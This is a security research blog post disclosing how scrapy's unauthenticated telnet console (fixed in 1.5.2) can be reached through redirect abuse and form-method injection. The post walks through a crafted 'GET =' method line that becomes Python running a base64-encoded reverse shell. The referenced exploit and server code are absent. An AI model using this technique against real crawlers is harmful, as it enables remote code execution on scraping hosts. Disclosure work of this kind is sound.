“Web scraping considered dangerous”: Exploiting the telnet service in scrapy < 1.5.2
--
Disclaimer: scrapy 1.5.2 has been released on January 22th, to avoid being exploited you must disable telnet console (enabled by default) or upgrade up to
1.5.2
at least.
This year the focus of our research will be security in web scraping frameworks. Why? Because it’s important for us. As a little context, between 2012 and 2017, I’ve worked at the world leader Scrapinghub programming more than 500 spiders. At alertot we use web spiders to get fresh vulnerabilities from several sources, then it’s a core component in our stack.
We use scrapy daily and most of the vulnerabilities will be related to it and its ecosystem in order to improve its security, but we also want to explore web scraping frameworks in other languages.
As a precedent, 5 years ago I discovered a nice XXE vulnerability in scrapy and you can read an updated version of that post here.
Ok, let’s go with the new material!
Just to clarify, the vulnerabilities exposed in this post affect scrapy < 1.5.2
. As mentioned in the changelog of scrapy 1.6.0, scrapy 1.5.2
introduced some security features in the telnet console, specifically authentication, which protects you from the vulnerabilities I’m going to reveal.
Debugging by default
Getting started with scrapy is easy. As you can see from the homepage, you can run your first spider in seconds and the log shows information about enabled extensions, middlewares and other options. What always has called my attention is a telnet service enabled by default.
[scrapy.middleware] INFO: Enabled extensions:
[‘scrapy.extensions.corestats.CoreStats’,
‘scrapy.extensions.telnet.TelnetConsole’,
‘scrapy.extensions.memusage.MemoryUsage’,
‘scrapy.extensions.logstats.LogStats’]
[…]
[scrapy.extensions.telnet] DEBUG: Telnet console listening on 127.0.0.1:6023
It’s the telnet console running on port 6023
, which purpose is to make debugging easier. Usually telnet services are restricted to a set of functions but this console provides a python shell in the context of the spider, which makes it powerful for debugging and interesting if someone gets access to it.
To be sincere, it’s not common to turn to the telnet console. I’ve used it to debug spiders either running out of memory (in restricted environments) or taking forever, totalling around 5 out of 500+ spiders.
My concern was that console was available without any authentication, then any local user could connect to the port and execute commands in the context of the user running the spider. The first proof of concept is to try to exploit this local privilege escalation (LPE) bug.
An easy LPE
To demonstrate this exploitation, there are two requirements:
- The exploiter has access to the system.
- There’s a spider running and exposing the telnet service. The following spider meets this requirement, making an initial request and then idling because of the
download_delay
setting.
Our exploit is simple:
It defines a reverse shell, connects to the telnet service and sends a line to execute the reverse shell using Python’s os.system
. I’ve created the next video to show this in action!
Now, we’re going to begin our journey to pass from this local exploitation to a remote exploitation!
Taking control of spider’s requests
Below there’s a spider created by the command scrapy genspider example example.org
.
It contains some class attributes and one of them is allowed_domains
. According to the documentation, it is defined as:
An optional list of strings containing domains that this spider is allowed to crawl. Requests for URLs not belonging to the domain names specified in this list (or their subdomains) won’t be followed if
OffsiteMiddleware
is enabled.
Then, if the spider tries to make a request to example.edu
, it will be filtered and displayed on the log:
[scrapy.spidermiddlewares.offsite] DEBUG: Filtered offsite request to ‘example.edu’: <GET http://example.edu>
However, an interesting behavior happens when there’s a request to a page in an allowed domain but redirects to a not allowed domain, since it won’t be filtered and will be processed by the spider.
As reported here and in many other issues, it’s a known behavior. Paul Tremberth put some context on the issue and there are some possible fixes (i.e. 1002) but nothing official.
That’s an unintended behavior but under security scrutiny it’s something. Imagine that there’s a dangerous.tld
website and you want to create a spider that logs in to the user area. The server side logic would be like this:
The template login.html
used on route /
displays a form with action=/login
. A sample spider for the website would be:
An overview of the steps are:
- The spider sends a
GET
request tohttp://dangerous.tld/
at line 8. - At line 11, it sends a
POST
request usingFormRequest.from_response
that detects automatically the form in the web page and sets the form values based onformdata
dictionary. - At line 18 the spider prints that the authentication was successful.
Let’s run the spider:
[scrapy.core.engine] DEBUG: Crawled (200) <GET http://dangerous.tld/> (referer: None)
[scrapy.core.engine] DEBUG: Crawled (200) <POST http://dangerous.tld/login> (referer: http://dangerous.tld/)
authenticated
[scrapy.core.engine] INFO: Closing spider (finished)
Everything is fine, the spider is working and logs in successfully. What about the website becoming a malicious actor?
Abusing of allowed_domains
behavior, the malicious actor could manage that the spider sends requests to domains of its interest. To demonstrate this, we will review the spider steps. The first step of our spider creates a GET
request to /
and the original code for the home endpoint is:
However, the website (now malicious) changes the logic to:
Running again the spider gives us the following output:
[scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (302) to <GET http://example.org> from <GET http://dangerous.tld/>
[scrapy.core.engine] DEBUG: Crawled (200) <GET http://example.org> (referer: None)
[scrapy.core.scraper] ERROR: Spider error processing <GET http://example.org> (referer: None)
Despite the error, indeed the spider has requested http://example.org
with a GET
request. Moreover, it’s also possible to redirect the POST
request (with its body) created in step 2 using a redirect with code 307.
Actually, it’s some class of SSRF that I’d name “Spider Side Request Forgery” (everyone wants to create new terms 😃). It’s important to note some details about the environment:
- Usually a spider is only scraping one website, then it’s not common that a spider is authenticated on another website/domain.
- The spider requests the URL and likely there’s no way to get back the response (it’s different from common SSRF).
- Until now, we can control only the full URL and maybe some part of the body in a
POST
request.
In spite of all these constraints, this kind of vulnerability, as well as SSRF, opens a new scope: the local network and localhost. Certainly we don’t know about services in the local network, so the key question is: what’s surely running on localhost, unauthenticated and provides code execution capabilities? The telnet service!
Let’s speak telnet language
Now, we’re going to redirect the requests to localhost:6023
.
Running the spider against this malicious actor gives us a lot of errors:
[scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (302) to <GET http://localhost:6023> from <GET http://dangerous.tld/>
[scrapy.downloadermiddlewares.retry] DEBUG: Retrying <GET http://localhost:6023> (failed 1 times): [<twisted.python.failure.Failu
re twisted.web._newclient.ParseError: (‘non-integer status code’, b’\xff\xfd”\xff\xfd\x1f\xff\xfd\x03\xff\xfb\x01\x1bc>>> \x1b[4hGET / HTTP/1.1\r\r’)
>]
Unhandled Error
Traceback (most recent call last):
Failure: twisted.internet.error.ConnectionDone: Connection was closed cleanly.
It seems that the number of errors is equal to the number of lines of our GET
request (including headers), then we are reaching the telnet port but not sending a valid Python line. We need more control of sent data since GET
instruction and headers don’t meet Python syntax. What about the body part of the POST
request sending the login credentials?
Let’s come back to the original version of home
route and try to exploit the login form logic.
Posting to telnet
The idea of using a POST
request is to handle the request’s body, as near the start as possible to build a valid Python line. The argument formdata
passed to FormRequest.from_response
will update the form values, adding these new values at the end of the request’s body. That’s great, the malicious actor could add a hidden input to the form and it would be at the start of request’s body.
The request’s body sent by the spider starts with malicious=1
, however FormRequest.from_response
encodes with URL-encoding every input then it’s not possible to build a valid Python line.
After that, I tried with form enctype but FormRequest doesn’t care about that value and just setsContent-Type: application/x-www-form-urlencoded
. Game over!
Is it possible to send a
POST
request without an encoded body? Yes, using the normal Request class withmethod=POST
and set body. It’s the way to sendPOST
requests with aJSON
body but I don’t consider that a real scenario where the malicious actor could have control of the body of that request.
Something more to try? I know that the method should be a list of valid values ( GET, POST, etc
) but let’s try if scrapy is compliant with that. We’re going to modify the form method to gaga
and see the output of the spider:
[scrapy.core.engine] DEBUG: Crawled (200) <GET http://dangerous.tld/> (referer: None)
[scrapy.core.engine] DEBUG: Crawled (405) <GAGA http://dangerous.tld/login?username=user&password=secret> (referer: http://danger
ous.tld/)
It doesn’t validate that the method of the form is valid, good news! If I create a HTTP server supporting GAGA
method, I could send a redirect to localhost:6023/payload
and this new request with GAGA
method will reach the telnet service. There’s hope for us!
Creating the Python line
The idea is to create a valid line and then try to comment the remainder of the line. Taking into account how a HTTP
request is built and the idea of a custom HTTP server, the line sent to the telnet console eventually will be:
GAGA /payload HTTP/1.1
As seen in previous output, scrapy has uppercased my method gaga
to GAGA
, then I can’t inject immediately Python code because it will be invalid. As the method will be always first, the only option I saw was to use a method like GET ='
to create a valid string variable and then in the URI put the closing apostrophe and start my Python code.
GET =' /';mypayload; HTTP/1.1
payload
is Python code and can be separated by semicolons. The idea of commenting the remainder of the line after payload
is not possible since scrapy deletes the character #
. The remainder is HTTP/1.1
, then if I declare HTTP
as a float, it would be a valid division and won’t raise any exception. The final line would look like this:
GET =' /';payload;HTTP=2.0; HTTP/1.1
Glueing everything together
The payload
section is special:
- It can’t contain any space.
- The scope is limited i.e. the variable
GET
doesn’t exist inpayload
scope. - Some characters like
<
or>
are url-encoded.
Taking in consideration these limitations, we’re going to build our payload
as this:
At line 1 we define our reverse shell, at line 2 we encode it in base64
encoding and we use the magic function __import__
to import the modules os
and base64
that eventually allow to execute our reverse shell as a command.
Now, we have to create a webserver capable of handling this special GET ='
method. Since popular frameworks don’t allow that (at least with ease), as well as in the XXE exploitation, I had to hack the class BaseHTTPRequestHandler from http
module to serve the valid GET
and the invalidGET ='
requests. The custom web server is below:
The important pieces are:
- Line 11 serves
malicious_login.html
template when the server receives theGET
request to the endpoint/
. What is different in thismalicious_login.html
file? Our special method!
- At line 33 it’s the start of the method
handle_one_request
from the parent class. It’s almost the same, except that at line 52 we detect that the form was sent (seeing that there’s anusername
string in the URI). - At line 18, we define our malicious logic. First, we set a 307 redirect code, that way it keeps our weird method and it’s not changed. Then, we build our payload and send a
Location
header to the spider, that way it will hit the telnet service.
Let’s see this in action!
Conclusion
After this unexpected exploitation, I’m going to create some issues on Github to address the issues related to unfiltered redirections and invalid form methods.
I really liked the decision took on scrapy 1.5.2
since they added authentication to the telnet service with user/password and if the password is not set, they create a random and secure one. It’s not optional security, it’s security by design.
I hope you enjoyed this post and stay tuned for the following part of this research!